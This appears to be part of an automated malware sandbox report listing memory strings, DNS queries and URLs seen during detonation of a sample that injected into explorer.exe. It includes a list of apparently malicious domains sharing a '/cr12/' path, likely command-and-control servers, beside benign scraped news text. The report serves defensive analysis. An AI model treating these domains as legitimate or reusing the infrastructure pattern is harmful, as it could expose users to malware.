          Source: explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: s Spider-Man Remastered 08:54 - A Plague Tale Requiem 10:00 - Assassin's Creed Mirage 10:24 - Watch Dogs Legion 10:44 - Hitman 3 11:28 - Counter Strike 2 12:13 - Call Of Duty Modern Warfare III 12:50 - 12 Game Average [1080p] 13:43 - Final Thoughts Read this feature on TechSpot: https://www.techspot.com/review/2821-amd-ryzen-7800x3d-7900x3d-7950x3d/ V Cache Battle: 7800X3D vs 7900X3D vs 7950X3D Disclaimer: Any pricing information shown or mentioned in this video was accurate at the time of video production, and may have since changed Disclosure: As an Amazon Associate we earn from qualifying purchases. We may also earn a commission on some sales made through other store links FOLLOW US IN THESE PLACES FOR UPDATES Twitter - http://twitter.com/hardwareunboxed Facebook - http://facebook.com/hardwareunboxed Instagram - https://www.instagram.com/hardwareunboxed/ Outro music by David Vonk/DaJaVo","url":"https://www.youtube.com/watch?v=Gu12QOQiUUI","locale":"en-us","isLocalContent":false,"publishedDateTime":"2024-03-28T10:00:23","feed":{"feedName":"news","lastFreActionTimestamp":0},"isFeatured":false,"images":[{"width":3840,"height":2160,"url":"https://th.bing.com/th?id=OVP.Zg5kob1eG3vNAhn5g3iOGQHgFo","title":"AMD Ryzen 7 7800X3D vs. Ryzen 9 7900X3D vs. Ryzen 9 7950X3D, Gaming Benchmark","caption":"AMD Ryzen 7 7800X3D vs. Ryzen 9 7900X3D vs. Ryzen 9 7950X3D, Gaming Benchmark","source":"bing","colorSamples":[{"isDarkMode":true,"hexColor":"#2E2E2E","isGreyScale":false},{"isDarkMode":false,"hexColor":"#F5F5F5","isGreyScale":false}]}],"colorSamples":[{"isDarkMode":true,"hexColor":"#253D3B","isGreyScale":false},{"isDarkMode":false,"hexColor":"#EAF5F5","isGreyScale":false}],"provider":{"id":"vid-gkg786ucfpu46xnx5n80yvfyceqwsqweke9jhc8g7a0782qsfc0a","name":"Hardware Unboxed","logoUrl":"https://www.bing.com/th?id=AR_e1aad59e9b84f32b322c4036057c9f3d"},"category":"news","reactionSummary":{"totalCount":30,"subReactionSummaries":[{"totalCount":24,"type":"upvote"},{"totalCount":6,"type":"downvote"}]},"reactionStatus":"on","commentSummary":{"totalCount":0},"commentStatus":"on","cardId":7,"reasons":[{"type":"explore","rank":0,"follow":{"id":"","name":"gaming","time":""}}],"recoId":"m9EZkeedgX5eUa-QBobFkaKzgm","source":"WebVideo"},{"id":"BB1j6YDZ","type":"video","title":"Top 10 Catchiest Songs of the 2010s","abstract":"These songs have been living rent-free in our head for years! For this list, we equals www.twitter.com (Twitter)
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: s Spider-Man Remastered 08:54 - A Plague Tale Requiem 10:00 - Assassin's Creed Mirage 10:24 - Watch Dogs Legion 10:44 - Hitman 3 11:28 - Counter Strike 2 12:13 - Call Of Duty Modern Warfare III 12:50 - 12 Game Average [1080p] 13:43 - Final Thoughts Read this feature on TechSpot: https://www.techspot.com/review/2821-amd-ryzen-7800x3d-7900x3d-7950x3d/ V Cache Battle: 7800X3D vs 7900X3D vs 7950X3D Disclaimer: Any pricing information shown or mentioned in this video was accurate at the time of video production, and may have since changed Disclosure: As an Amazon Associate we earn from qualifying purchases. We may also earn a commission on some sales made through other store links FOLLOW US IN THESE PLACES FOR UPDATES Twitter - http://twitter.com/hardwareunboxed Facebook - http://facebook.com/hardwareunboxed Instagram - https://www.instagram.com/hardwareunboxed/ Outro music by David Vonk/DaJaVo","url":"https://www.youtube.com/watch?v=Gu12QOQiUUI","locale":"en-us","isLocalContent":false,"publishedDateTime":"2024-03-28T10:00:23","feed":{"feedName":"news","lastFreActionTimestamp":0},"isFeatured":false,"images":[{"width":3840,"height":2160,"url":"https://th.bing.com/th?id=OVP.Zg5kob1eG3vNAhn5g3iOGQHgFo","title":"AMD Ryzen 7 7800X3D vs. Ryzen 9 7900X3D vs. Ryzen 9 7950X3D, Gaming Benchmark","caption":"AMD Ryzen 7 7800X3D vs. Ryzen 9 7900X3D vs. Ryzen 9 7950X3D, Gaming Benchmark","source":"bing","colorSamples":[{"isDarkMode":true,"hexColor":"#2E2E2E","isGreyScale":false},{"isDarkMode":false,"hexColor":"#F5F5F5","isGreyScale":false}]}],"colorSamples":[{"isDarkMode":true,"hexColor":"#253D3B","isGreyScale":false},{"isDarkMode":false,"hexColor":"#EAF5F5","isGreyScale":false}],"provider":{"id":"vid-gkg786ucfpu46xnx5n80yvfyceqwsqweke9jhc8g7a0782qsfc0a","name":"Hardware Unboxed","logoUrl":"https://www.bing.com/th?id=AR_e1aad59e9b84f32b322c4036057c9f3d"},"category":"news","reactionSummary":{"totalCount":30,"subReactionSummaries":[{"totalCount":24,"type":"upvote"},{"totalCount":6,"type":"downvote"}]},"reactionStatus":"on","commentSummary":{"totalCount":0},"commentStatus":"on","cardId":7,"reasons":[{"type":"explore","rank":0,"follow":{"id":"","name":"gaming","time":""}}],"recoId":"m9EZkeedgX5eUa-QBobFkaKzgm","source":"WebVideo"},{"id":"BB1j6YDZ","type":"video","title":"Top 10 Catchiest Songs of the 2010s","abstract":"These songs have been living rent-free in our head for years! For this list, we equals www.youtube.com (Youtube)
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: s risk-free! Hearing the word \"superacid\" may evoke memories of that scene from Breaking Bad, but perhaps counterintuitively, the strongest acid on Earth wouldn't be able to destroy your bathroom. Our previous video about the strongest acids in the world: https://www.youtube.com/watch?v=cbN37yRV-ZY Hosted by: Stefan Chin ---------- Support SciShow by becoming a patron on Patreon: https://www.patreon.com/scishow ---------- Huge thanks go to the following Patreon supporters for helping us keep SciShow free for everyone forever: Adam Brainard, Alex Hackman, Ash, Bryan Cloer, charles george, Chris Mackey, Chris Peters, Christoph Schwanke, Christopher R Boucher, Eric Jensen, Harrison Mills, Jaap Westera, Jason A, Saslow, Jeffrey Mckishen, Jeremy Mattern, Kevin Bealer, Matt Curls, Michelle Dove, Piya Shedden, Rizwan Kassim, Sam Lutfi ---------- Looking for SciShow elsewhere on the internet? SciShow Tangents Podcast: https://scishow-tangents.simplecast.com/ TikTok: https://www.tiktok.com/@scishow Twitter: http://www.twitter.com/scishow Instagram: http://instagram.com/thescishow Facebook: http://www.facebook.com/scishow #SciShow #science #education #learning #complexly ---------- Sources: https://www.acs.org/molecule-of-the-week/archive/f/fluoroantimonic-acid.html https://chem.libretexts.org/Courses/University_of_Illinois_Springfield/UIS%3A_CHE_267_-_Organic_Chemistry_I_(Morsch)/Chapters/Chapter_02%3A_Acids_and_Bases/5.1%3A_Br%C3%B8nsted%E2%80%93Lowry_Acids_and_Bases https://2012books.lardbucket.org/books/principles-of-general-chemistry-v1.0/s31-appendix-c-dissociation-consta.html https://chem.libretexts.org/Bookshelves/Introductory_Chemistry/Introductory_Chemistry_(CK-12)/21%3A_Acids_and_Bases/21.12%3A_Strong_and_Weak_Acids_and_Acid_Ionization_Constant_(K_texta) https://chem.libretexts.org/Bookshelves/Physical_and_Theoretical_Chemistry_Textbook_Maps/Supplemental_Modules_(Physical_and_Theoretical_Chemistry)/Acids_and_Bases/Ionization_Constants/Calculating_A_Ka_Value_From_A_Measured_Ph https://chem.libretexts.org/Courses/University_of_Missouri/MU%3A__1330H_(Keller)/16%3A_AcidBase_Equilibria/16.05%3A_Strong_Acids_and_Bases https://flexbooks.ck12.org/cbook/ck-12-chemistry-flexbook-2.0/section/21.12/primary/lesson/strong-and-weak-acids-and-acid-ionization-constant-ka-chem/ https://www.chem.purdue.edu/gchelp/howtosolveit/Equilibrium/Calculating_pHandpOH.htm https://www.aqion.de/site/ph-of-common-acids https://www.thoughtco.com/is-a-negative-ph-possible-603653 https://chem.libretexts.org/Bookshelves/Physical_and_Theoretical_Chemistry_Textbook_Maps/Supplemental_Modules_(Physical_and_Theoretical_Chemistry)/Acids_and_Bases/Acids_and_Bases_in_Aqueous_Solutions/The_pH_Scale https://atlas-scientific.com/blog/can-ph-probe-detect-negative-ph/ https://sciencenotes.org/the-worlds-strongest-acid-the-superacids/ https://www.chemeurope.com/en/encyclopedia/Hammett_acidity_function.html https://www2.chemistry.msu.edu/faculty/reusch/AcidBase/acid-base.html https://www.chem
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: s risk-free! Hearing the word \"superacid\" may evoke memories of that scene from Breaking Bad, but perhaps counterintuitively, the strongest acid on Earth wouldn't be able to destroy your bathroom. Our previous video about the strongest acids in the world: https://www.youtube.com/watch?v=cbN37yRV-ZY Hosted by: Stefan Chin ---------- Support SciShow by becoming a patron on Patreon: https://www.patreon.com/scishow ---------- Huge thanks go to the following Patreon supporters for helping us keep SciShow free for everyone forever: Adam Brainard, Alex Hackman, Ash, Bryan Cloer, charles george, Chris Mackey, Chris Peters, Christoph Schwanke, Christopher R Boucher, Eric Jensen, Harrison Mills, Jaap Westera, Jason A, Saslow, Jeffrey Mckishen, Jeremy Mattern, Kevin Bealer, Matt Curls, Michelle Dove, Piya Shedden, Rizwan Kassim, Sam Lutfi ---------- Looking for SciShow elsewhere on the internet? SciShow Tangents Podcast: https://scishow-tangents.simplecast.com/ TikTok: https://www.tiktok.com/@scishow Twitter: http://www.twitter.com/scishow Instagram: http://instagram.com/thescishow Facebook: http://www.facebook.com/scishow #SciShow #science #education #learning #complexly ---------- Sources: https://www.acs.org/molecule-of-the-week/archive/f/fluoroantimonic-acid.html https://chem.libretexts.org/Courses/University_of_Illinois_Springfield/UIS%3A_CHE_267_-_Organic_Chemistry_I_(Morsch)/Chapters/Chapter_02%3A_Acids_and_Bases/5.1%3A_Br%C3%B8nsted%E2%80%93Lowry_Acids_and_Bases https://2012books.lardbucket.org/books/principles-of-general-chemistry-v1.0/s31-appendix-c-dissociation-consta.html https://chem.libretexts.org/Bookshelves/Introductory_Chemistry/Introductory_Chemistry_(CK-12)/21%3A_Acids_and_Bases/21.12%3A_Strong_and_Weak_Acids_and_Acid_Ionization_Constant_(K_texta) https://chem.libretexts.org/Bookshelves/Physical_and_Theoretical_Chemistry_Textbook_Maps/Supplemental_Modules_(Physical_and_Theoretical_Chemistry)/Acids_and_Bases/Ionization_Constants/Calculating_A_Ka_Value_From_A_Measured_Ph https://chem.libretexts.org/Courses/University_of_Missouri/MU%3A__1330H_(Keller)/16%3A_AcidBase_Equilibria/16.05%3A_Strong_Acids_and_Bases https://flexbooks.ck12.org/cbook/ck-12-chemistry-flexbook-2.0/section/21.12/primary/lesson/strong-and-weak-acids-and-acid-ionization-constant-ka-chem/ https://www.chem.purdue.edu/gchelp/howtosolveit/Equilibrium/Calculating_pHandpOH.htm https://www.aqion.de/site/ph-of-common-acids https://www.thoughtco.com/is-a-negative-ph-possible-603653 https://chem.libretexts.org/Bookshelves/Physical_and_Theoretical_Chemistry_Textbook_Maps/Supplemental_Modules_(Physical_and_Theoretical_Chemistry)/Acids_and_Bases/Acids_and_Bases_in_Aqueous_Solutions/The_pH_Scale https://atlas-scientific.com/blog/can-ph-probe-detect-negative-ph/ https://sciencenotes.org/the-worlds-strongest-acid-the-superacids/ https://www.chemeurope.com/en/encyclopedia/Hammett_acidity_function.html https://www2.chemistry.msu.edu/faculty/reusch/AcidBase/acid-base.html https://www.chem
          Source: explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: s risk-free! Hearing the word \"superacid\" may evoke memories of that scene from Breaking Bad, but perhaps counterintuitively, the strongest acid on Earth wouldn't be able to destroy your bathroom. Our previous video about the strongest acids in the world: https://www.youtube.com/watch?v=cbN37yRV-ZY Hosted by: Stefan Chin ---------- Support SciShow by becoming a patron on Patreon: https://www.patreon.com/scishow ---------- Huge thanks go to the following Patreon supporters for helping us keep SciShow free for everyone forever: Adam Brainard, Alex Hackman, Ash, Bryan Cloer, charles george, Chris Mackey, Chris Peters, Christoph Schwanke, Christopher R Boucher, Eric Jensen, Harrison Mills, Jaap Westera, Jason A, Saslow, Jeffrey Mckishen, Jeremy Mattern, Kevin Bealer, Matt Curls, Michelle Dove, Piya Shedden, Rizwan Kassim, Sam Lutfi ---------- Looking for SciShow elsewhere on the internet? SciShow Tangents Podcast: https://scishow-tangents.simplecast.com/ TikTok: https://www.tiktok.com/@scishow Twitter: http://www.twitter.com/scishow Instagram: http://instagram.com/thescishow Facebook: http://www.facebook.com/scishow #SciShow #science #education #learning #complexly ---------- Sources: https://www.acs.org/molecule-of-the-week/archive/f/fluoroantimonic-acid.html https://chem.libretexts.org/Courses/University_of_Illinois_Springfield/UIS%3A_CHE_267_-_Organic_Chemistry_I_(Morsch)/Chapters/Chapter_02%3A_Acids_and_Bases/5.1%3A_Br%C3%B8nsted%E2%80%93Lowry_Acids_and_Bases https://2012books.lardbucket.org/books/principles-of-general-chemistry-v1.0/s31-appendix-c-dissociation-consta.html https://chem.libretexts.org/Bookshelves/Introductory_Chemistry/Introductory_Chemistry_(CK-12)/21%3A_Acids_and_Bases/21.12%3A_Strong_and_Weak_Acids_and_Acid_Ionization_Constant_(K_texta) https://chem.libretexts.org/Bookshelves/Physical_and_Theoretical_Chemistry_Textbook_Maps/Supplemental_Modules_(Physical_and_Theoretical_Chemistry)/Acids_and_Bases/Ionization_Constants/Calculating_A_Ka_Value_From_A_Measured_Ph https://chem.libretexts.org/Courses/University_of_Missouri/MU%3A__1330H_(Keller)/16%3A_AcidBase_Equilibria/16.05%3A_Strong_Acids_and_Bases https://flexbooks.ck12.org/cbook/ck-12-chemistry-flexbook-2.0/section/21.12/primary/lesson/strong-and-weak-acids-and-acid-ionization-constant-ka-chem/ https://www.chem.purdue.edu/gchelp/howtosolveit/Equilibrium/Calculating_pHandpOH.htm https://www.aqion.de/site/ph-of-common-acids https://www.thoughtco.com/is-a-negative-ph-possible-603653 https://chem.libretexts.org/Bookshelves/Physical_and_Theoretical_Chemistry_Textbook_Maps/Supplemental_Modules_(Physical_and_Theoretical_Chemistry)/Acids_and_Bases/Acids_and_Bases_in_Aqueous_Solutions/The_pH_Scale https://atlas-scientific.com/blog/can-ph-probe-detect-negative-ph/ https://sciencenotes.org/the-worlds-strongest-acid-the-superacids/ https://www.chemeurope.com/en/encyclopedia/Hammett_acidity_function.html https://www2.chemistry.msu.edu/faculty/reusch/AcidBase/acid-base.html https://www.chem
          Source: global trafficDNS traffic detected: DNS query: www.bolinkpass.club
          Source: global trafficDNS traffic detected: DNS query: www.spiritualpath.info
          Source: global trafficDNS traffic detected: DNS query: www.sugardefender24-usa.us
          Source: global trafficDNS traffic detected: DNS query: www.nff1291.com
          Source: global trafficDNS traffic detected: DNS query: www.henslotalt.us
          Source: global trafficDNS traffic detected: DNS query: www.65302.vip
          Source: global trafficDNS traffic detected: DNS query: www.lotusluxecandle.com
          Source: global trafficDNS traffic detected: DNS query: www.carneden.com
          Source: global trafficDNS traffic detected: DNS query: www.pedandmore.com
          Source: global trafficDNS traffic detected: DNS query: www.junongpei.website
          Source: global trafficDNS traffic detected: DNS query: www.winningpickleballshots.com
          Source: global trafficDNS traffic detected: DNS query: www.thetrendingproduct.com
          Source: global trafficDNS traffic detected: DNS query: www.veryaroma.com
          Source: global trafficDNS traffic detected: DNS query: www.epuar.com
          Source: global trafficDNS traffic detected: DNS query: www.warehouse-inventory-80963.bond
          Source: global trafficDNS traffic detected: DNS query: www.jfgminimalist.com
          Source: global trafficDNS traffic detected: DNS query: www.ferradaoffroad.com
          Source: global trafficDNS traffic detected: DNS query: www.free-cell-phones-en-arena.sbs
          Source: global trafficDNS traffic detected: DNS query: www.84031.vip
          Source: global trafficDNS traffic detected: DNS query: www.footresort.com
          Source: global trafficDNS traffic detected: DNS query: www.priuswuxi.com
          Source: explorer.exe, 00000006.00000000.30301220528.000000000C63B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229369761.000000000C63B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
          Source: explorer.exe, 00000006.00000003.32856171565.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961855101.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35224772424.0000000008FDA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicer
          Source: explorer.exe, 00000006.00000000.30301220528.000000000C63B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229369761.000000000C63B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://instagram.com/thescishow
          Source: explorer.exe, 00000006.00000000.30301220528.000000000C63B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229369761.000000000C63B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUgUABBQ
          Source: explorer.exe, 00000006.00000000.30301220528.000000000C63B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229369761.000000000C63B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000006.00000003.32856171565.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961855101.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35224772424.0000000008FDA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: explorer.exe, 00000006.00000002.35227465445.000000000A590000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.35227096684.0000000009FB0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.35221059449.0000000002B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: yPURXYpFVuXra2o.exe, 00000003.00000002.32566392744.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: yPURXYpFVuXra2o.exeString found in binary or memory: http://tempuri.org/dsGeneral.xsd
          Source: yPURXYpFVuXra2o.exeString found in binary or memory: http://tempuri.org/dsGeneral2.xsd
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://twitter.com/hardwareunboxed
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.65302.vip
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.65302.vip/cr12/
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.65302.vip/cr12/www.lotusluxecandle.com
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.65302.vipReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.84031.vip
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.84031.vip/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.84031.vip/cr12/www.lotusluxecandle.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.84031.vipReferer:
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bolinkpass.club
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bolinkpass.club/cr12/
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bolinkpass.club/cr12/www.spiritualpath.info
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bolinkpass.clubReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.carneden.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.carneden.com/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.carneden.com/cr12/www.pedandmore.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.carneden.comReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.epuar.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.epuar.com/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.epuar.com/cr12/www.warehouse-inventory-80963.bond
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.epuar.comReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ferradaoffroad.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ferradaoffroad.com/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ferradaoffroad.com/cr12/www.free-cell-phones-en-arena.sbs
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ferradaoffroad.comReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.footresort.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.footresort.com/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.footresort.com/cr12/www.priuswuxi.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.footresort.comReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.free-cell-phones-en-arena.sbs
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.free-cell-phones-en-arena.sbs/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.free-cell-phones-en-arena.sbs/cr12/www.84031.vip
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.free-cell-phones-en-arena.sbsReferer:
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.henslotalt.us
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.henslotalt.us/cr12/
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.henslotalt.us/cr12/www.ptwix.xyz
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.henslotalt.usReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jfgminimalist.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jfgminimalist.com/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jfgminimalist.com/cr12/www.ferradaoffroad.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jfgminimalist.comReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.junongpei.website
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.junongpei.website/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.junongpei.website/cr12/www.winningpickleballshots.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.junongpei.websiteReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lotusluxecandle.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lotusluxecandle.com/cr12/
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lotusluxecandle.com/cr12/www.carneden.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lotusluxecandle.com/cr12/www.ptwix.xyz
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lotusluxecandle.comReferer:
